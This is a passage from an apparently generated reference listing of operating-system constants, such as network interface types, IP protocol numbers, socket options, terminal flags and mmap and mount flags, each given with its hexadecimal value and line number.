669) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 670) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 671) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 672) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 673) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 674) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 675) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 676) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 677) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 678) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 679) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 680) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 681) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 682) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 683) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 684) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 685) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 686) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 687) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 688) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 689) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 690) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 691) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 692) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 693) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 694) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 695) | IFT_HSSI = 0x2e constant IFT_HY (line 696) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 697) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 698) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 699) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 700) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 701) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 702) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 703) | IFT_IFGSN = 0x91 constant IFT_IMT (line 704) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 705) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 706) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 707) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 708) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 709) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 710) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 711) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 712) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 713) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 714) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 715) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 716) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 717) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 718) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 719) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 720) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 721) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 722) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 723) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 724) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 725) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 726) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 727) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 728) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 729) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 730) | IFT_LAPB = 0x10 constant IFT_LAPD (line 731) | IFT_LAPD = 0x4d constant IFT_LAPF (line 732) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 733) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 734) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 735) | IFT_LOOP = 0x18 constant IFT_MEDIAMAILOVERIP (line 736) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 737) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 738) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 739) | IFT_MODEM = 0x30 constant IFT_MPC (line 740) | IFT_MPC = 0x71 constant IFT_MPLS (line 741) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 742) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 743) | IFT_MSDSL = 0x8f constant IFT_MVL (line 744) | IFT_MVL = 0xbf constant IFT_MYRINET (line 745) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 746) | IFT_NFAS = 0xaf constant IFT_NSIP (line 747) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 748) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 749) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 750) | IFT_OTHER = 0x1 constant IFT_P10 (line 751) | IFT_P10 = 0xc constant IFT_P80 (line 752) | IFT_P80 = 0xd constant IFT_PARA (line 753) | IFT_PARA = 0x22 constant IFT_PFLOG (line 754) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 755) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 756) | IFT_PLC = 0xae constant IFT_PON155 (line 757) | IFT_PON155 = 0xcf constant IFT_PON622 (line 758) | IFT_PON622 = 0xd0 constant IFT_POS (line 759) | IFT_POS = 0xab constant IFT_PPP (line 760) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 761) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 762) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 763) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 764) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 765) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 766) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 767) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 768) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 769) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 770) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 771) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 772) | IFT_PVC = 0xf1 constant IFT_Q2931 (line 773) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 774) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 775) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 776) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 777) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 778) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 779) | IFT_RS232 = 0x21 constant IFT_RSRB (line 780) | IFT_RSRB = 0x4f constant IFT_SDLC (line 781) | IFT_SDLC = 0x11 constant IFT_SDSL (line 782) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 783) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 784) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 785) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 786) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 787) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 788) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 789) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 790) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 791) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 792) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 793) | IFT_SONETVT = 0x33 constant IFT_SRP (line 794) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 795) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 796) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 797) | IFT_STARLAN = 0xb constant IFT_STF (line 798) | IFT_STF = 0xd7 constant IFT_T1 (line 799) | IFT_T1 = 0x12 constant IFT_TDLC (line 800) | IFT_TDLC = 0x74 constant IFT_TELINK (line 801) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 802) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 803) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 804) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 805) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 806) | IFT_ULTRA = 0x1d constant IFT_USB (line 807) | IFT_USB = 0xa0 constant IFT_V11 (line 808) | IFT_V11 = 0x40 constant IFT_V35 (line 809) | IFT_V35 = 0x2d constant IFT_V36 (line 810) | IFT_V36 = 0x41 constant IFT_V37 (line 811) | IFT_V37 = 0x78 constant IFT_VDSL (line 812) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 813) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 814) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 815) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 816) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 817) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 818) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 819) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 820) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 821) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 822) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 823) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 824) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 825) | IFT_VOICEOVERIP = 0x68 constant IFT_X213 (line 826) | IFT_X213 = 0x5d constant IFT_X25 (line 827) | IFT_X25 = 0x5 constant IFT_X25DDN (line 828) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 829) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 830) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 831) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 832) | IFT_XETHER = 0x1a constant IGNBRK (line 833) | IGNBRK = 0x1 constant IGNCR (line 834) | IGNCR = 0x80 constant IGNPAR (line 835) | IGNPAR = 0x4 constant IMAXBEL (line 836) | IMAXBEL = 0x2000 constant INLCR (line 837) | INLCR = 0x40 constant INPCK (line 838) | INPCK = 0x10 constant IN_CLASSA_HOST (line 839) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 840) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 841) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 842) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 843) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 844) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 845) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 846) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 847) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 848) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 849) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 850) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 851) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 852) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 853) | IN_LOOPBACKNET = 0x7f constant IPPROTO_AH (line 854) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 855) | IPPROTO_CARP = 0x70 constant IPPROTO_DONE (line 856) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 857) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 858) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 859) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 860) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 861) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 862) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 863) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 864) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 865) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 866) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 867) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 868) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 869) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 870) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 871) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 872) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 873) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 874) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 875) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IPV6_ICMP (line 876) | IPPROTO_IPV6_ICMP = 0x3a constant IPPROTO_MAX (line 877) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 878) | IPPROTO_MAXID = 0x34 constant IPPROTO_MOBILE (line 879) | IPPROTO_MOBILE = 0x37 constant IPPROTO_NONE (line 880) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 881) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 882) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 883) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 884) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 885) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 886) | IPPROTO_RSVP = 0x2e constant IPPROTO_TCP (line 887) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 888) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 889) | IPPROTO_UDP = 0x11 constant IPPROTO_VRRP (line 890) | IPPROTO_VRRP = 0x70 constant IPV6_CHECKSUM (line 891) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 892) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 893) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 894) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 895) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 896) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 897) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 898) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 899) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 900) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 901) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 902) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 903) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 904) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 905) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 906) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 907) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 908) | IPV6_MAXPACKET = 0xffff constant IPV6_MMTU (line 909) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 910) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 911) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 912) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 913) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 914) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 915) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 916) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 917) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 918) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 919) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 920) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 921) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 922) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 923) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 924) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 925) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 926) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTHDR (line 927) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 928) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 929) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 930) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 931) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 932) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 933) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 934) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 935) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 936) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 937) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 938) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 939) | IP_ADD_MEMBERSHIP = 0xc constant IP_DEFAULT_MULTICAST_LOOP (line 940) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 941) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 942) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 943) | IP_DROP_MEMBERSHIP = 0xd constant IP_EF (line 944) | IP_EF = 0x8000 constant IP_ERRORMTU (line 945) | IP_ERRORMTU = 0x15 constant IP_HDRINCL (line 946) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 947) | IP_IPSEC_POLICY = 0x16 constant IP_MAXPACKET (line 948) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 949) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 950) | IP_MF = 0x2000 constant IP_MINFRAGSIZE (line 951) | IP_MINFRAGSIZE = 0x45 constant IP_MINTTL (line 952) | IP_MINTTL = 0x18 constant IP_MSS (line 953) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 954) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 955) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 956) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 957) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 958) | IP_OPTIONS = 0x1 constant IP_PORTRANGE (line 959) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 960) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 961) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 962) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 963) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 964) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 965) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 966) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 967) | IP_RECVTTL = 0x17 constant IP_RETOPTS (line 968) | IP_RETOPTS = 0x8 constant IP_RF (line 969) | IP_RF = 0x8000 constant IP_TOS (line 970) | IP_TOS = 0x3 constant IP_TTL (line 971) | IP_TTL = 0x4 constant ISIG (line 972) | ISIG = 0x80 constant ISTRIP (line 973) | ISTRIP = 0x20 constant IXANY (line 974) | IXANY = 0x800 constant IXOFF (line 975) | IXOFF = 0x400 constant IXON (line 976) | IXON = 0x200 constant KERN_HOSTNAME (line 977) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 978) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 979) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 980) | KERN_VERSION = 0x4 constant LOCK_EX (line 981) | LOCK_EX = 0x2 constant LOCK_NB (line 982) | LOCK_NB = 0x4 constant LOCK_SH (line 983) | LOCK_SH = 0x1 constant LOCK_UN (line 984) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 985) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 986) | MADV_FREE = 0x6 constant MADV_NORMAL (line 987) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 988) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 989) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 990) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 991) | MADV_WILLNEED = 0x3 constant MAP_ALIGNMENT_16MB (line 992) | MAP_ALIGNMENT_16MB = 0x18000000 constant MAP_ALIGNMENT_1TB (line 993) | MAP_ALIGNMENT_1TB = 0x28000000 constant MAP_ALIGNMENT_256TB (line 994) | MAP_ALIGNMENT_256TB = 0x30000000 constant MAP_ALIGNMENT_4GB (line 995) | MAP_ALIGNMENT_4GB = 0x20000000 constant MAP_ALIGNMENT_64KB (line 996) | MAP_ALIGNMENT_64KB = 0x10000000 constant MAP_ALIGNMENT_64PB (line 997) | MAP_ALIGNMENT_64PB = 0x38000000 constant MAP_ALIGNMENT_MASK (line 998) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 999) | MAP_ALIGNMENT_SHIFT = 0x18 constant MAP_ANON (line 1000) | MAP_ANON = 0x1000 constant MAP_FILE (line 1001) | MAP_FILE = 0x0 constant MAP_FIXED (line 1002) | MAP_FIXED = 0x10 constant MAP_HASSEMAPHORE (line 1003) | MAP_HASSEMAPHORE = 0x200 constant MAP_INHERIT (line 1004) | MAP_INHERIT = 0x80 constant MAP_INHERIT_COPY (line 1005) | MAP_INHERIT_COPY = 0x1 constant MAP_INHERIT_DEFAULT (line 1006) | MAP_INHERIT_DEFAULT = 0x1 constant MAP_INHERIT_DONATE_COPY (line 1007) | MAP_INHERIT_DONATE_COPY = 0x3 constant MAP_INHERIT_NONE (line 1008) | MAP_INHERIT_NONE = 0x2 constant MAP_INHERIT_SHARE (line 1009) | MAP_INHERIT_SHARE = 0x0 constant MAP_NORESERVE (line 1010) | MAP_NORESERVE = 0x40 constant MAP_PRIVATE (line 1011) | MAP_PRIVATE = 0x2 constant MAP_RENAME (line 1012) | MAP_RENAME = 0x20 constant MAP_SHARED (line 1013) | MAP_SHARED = 0x1 constant MAP_STACK (line 1014) | MAP_STACK = 0x2000 constant MAP_TRYFIXED (line 1015) | MAP_TRYFIXED = 0x400 constant MAP_WIRED (line 1016) | MAP_WIRED = 0x800 constant MCL_CURRENT (line 1017) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1018) | MCL_FUTURE = 0x2 constant MNT_ASYNC (line 1019) | MNT_ASYNC = 0x40 constant MNT_BASIC_FLAGS (line 1020) | MNT_BASIC_FLAGS = 0xe782807f constant MNT_DEFEXPORTED (line 1021) | MNT_DEFEXPORTED = 0x200 constant MNT_DISCARD (line 1022) | MNT_DISCARD = 0x800000 constant MNT_EXKERB (line 1023) | MNT_EXKERB = 0x800 constant MNT_EXNORESPORT (line 1024) | MNT_EXNORESPORT = 0x8000000 constant MNT_EXPORTANON (line 1025) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1026) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1027) | MNT_EXPUBLIC = 0x10000000 constant MNT_EXRDONLY (line 1028) | MNT_EXRDONLY = 0x80 constant MNT_EXTATTR (line 1029) | MNT_EXTATTR = 0x1000000 constant MNT_FORCE (line 1030) | MNT_FORCE = 0x80000 constant MNT_GETARGS (line 1031) | MNT_GETARGS = 0x400000 constant MNT_IGNORE (line 1032) | MNT_IGNORE = 0x100000 constant MNT_LAZY (line 1033) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1034) | MNT_LOCAL = 0x1000 constant MNT_LOG (line 1035) | MNT_LOG = 0x2000000 constant MNT_NOATIME (line 1036) | MNT_NOATIME = 0x4000000 constant MNT_NOCOREDUMP (line 1037) | MNT_NOCOREDUMP = 0x8000 constant MNT_NODEV (line 1038) | MNT_NODEV = 0x10 constant MNT_NODEVMTIME (line 1039) | MNT_NODEVMTIME = 0x40000000 constant MNT_NOEXEC (line 1040) | MNT_NOEXEC = 0x4 constant MNT_NOSUID (line 1041) | MNT_NOSUID = 0x8 constant MNT_NOWAIT (line 1042) | MNT_NOWAIT = 0x2 constant MNT_OP_FLAGS (line 1043) | MNT_OP_FLAGS = 0x4d0000 constant MNT_QUOTA (line 1044) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1045) | MNT_RDONLY = 0x1 constant MNT_RELATIME (line 1046) | MNT_RELATIME = 0x20000 constant MNT_RELOAD (line 1047) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1048) | MNT_ROOTFS = 0x4000 constant MNT_SOFTDEP (line 1049) | MNT_SOFTDEP = 0x80000000 constant MNT_SYMPERM (line 1050) | MNT_SYMPERM = 0x20000000 constant MNT_SYNCHRONOUS (line 1051) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1052) | MNT_UNION = 0x20 constant MNT_UPDATE (line 1053) | MNT_UPDATE = 0x10000 constant MNT_VISFLAGMASK (line 1054) | MNT_VISFLAGMASK = 0xff90ffff constant MNT_WAIT (line 1055) | MNT_WAIT = 0x1 constant MSG_BCAST (line 1056) | MSG_BCAST = 0x100 constant MSG_CMSG_CLOEXEC (line 1057) | MSG_CMSG_CLOEXEC = 0x800 constant MSG_CONTROLMBUF (line 1058) | MSG_CONTROLMBUF = 0x2000000 constant MSG_CTRUNC (line 1059) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1060) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1061) | MSG_DONTWAIT = 0x80 constant MSG_EOR (line 1062) | MSG_EOR = 0x8 constant MSG_IOVUSRSPACE (line 1063) | MSG_IOVUSRSPACE = 0x4000000 constant MSG_LENUSRSPACE (line 1064) | MSG_LENUSRSPACE = 0x8000000 constant MSG_MCAST (line 1065) | MSG_MCAST = 0x200 constant MSG_NAMEMBUF (line 1066) | MSG_NAMEMBUF = 0x1000000 constant MSG_NBIO (line 1067) | MSG_NBIO = 0x1000 constant MSG_NOSIGNAL (line 1068) | MSG_NOSIGNAL = 0x400 constant MSG_OOB (line 1069) | MSG_OOB = 0x1 constant MSG_PEEK (line 1070) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1071) | MSG_TRUNC = 0x10 constant MSG_USERFLAGS (line 1072) | MSG_USERFLAGS = 0xffffff constant MSG_WAITALL (line 1073) | MSG_WAITALL = 0x40 constant MS_ASYNC (line 1074) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1075) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1076) | MS_SYNC = 0x4 constant NAME_MAX (line 1077) | NAME_MAX = 0x1ff constant NET_RT_DUMP (line 1078) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1079) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1080) | NET_RT_IFLIST = 0x5 constant 